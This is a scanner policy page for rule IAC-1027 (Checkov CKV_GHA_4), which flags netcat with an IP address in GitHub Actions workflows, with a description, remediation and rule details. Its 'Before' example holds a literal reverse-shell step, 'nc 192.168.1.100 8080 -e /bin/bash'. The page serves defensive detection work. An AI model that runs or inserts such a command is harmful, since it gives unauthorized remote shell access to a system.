Suspicious use of netcat with IP address
Description
This policy checks for suspicious use of netcat with an IP address in GitHub Actions workflow files. Netcat is a command-line tool that can be used to create reverse shells, which can lead to unauthorized access to a system. The presence of netcat with an IP address in a workflow file may indicate a potential security risk. It is essential to review and validate the use of netcat in workflow files to prevent potential security breaches.
Code Example
yaml
# Before:
steps:
- name: Execute command
run: 'nc 192.168.1.100 8080 -e /bin/bash'
# After:
steps:
- name: Execute command
run: 'echo "Netcat command removed for security reasons"'Remediation
Remove or modify the netcat command to prevent potential reverse shell attacks. Ensure that the use of netcat is legitimate and necessary for the workflow.
Rule Details
| Field | Value |
|---|---|
| ID | IAC-1027 |
| Severity | HIGH |
| IaC Type | github_actions |
| Frameworks | jobs, jobs.*.steps[] |
| Checkov ID | CKV_GHA_4 |